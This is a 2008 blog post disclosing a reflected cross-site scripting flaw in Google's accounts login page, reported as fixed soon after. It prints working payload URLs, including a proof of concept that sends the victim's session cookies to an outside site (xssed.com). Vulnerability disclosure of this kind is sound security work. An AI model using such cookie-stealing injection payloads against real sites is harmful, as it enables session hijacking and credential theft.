Google accounts SSL login page suffers from highly critical XSS

Nov 13, 2008 | Category: Google Vulns

In this case, the fact that SSL is being used on the login page, does not necessarily mean that the users’ login information is secured. UPDATE: this was fixed a few hours after publishing it.

Malicious people can exploit this Google XSS to propagate malware, spyware, adware and steal authentication credentials.

Mirror:
http://www.xssed.com/mirror/54247/

XSS:

https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e%27%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone

Redirection and document.cookie PoC:

https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e’”><SCRIPT>location.href+%3D+’http%3A%2F%2Fwww.xssed.com/?’%2Bdocument.cookie<%2FSCRIPT>&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone

Mirror of similar old Google XSS (now fixed):
http://www.xssed.com/mirror/25472/

Security researcher “Xylitol” is credited with the discovery of this critical bug.

It is only a matter of minutes before we see it fixed by Google.

Related posts:

  1. Google Sites Reflective Cross-Site Scripting
  2. Due nuove vulnerabilita’ per Google
  3. New critical XSS bug in Google Code Search
  4. [XSS] New XSS Vulnerability of suggestqueries.google.com
  5. New in Labs: Refresh POP accounts

Bookmark and Share
Permalink Comments (0) Nov 13, 2008

Leave a Reply with your Google Account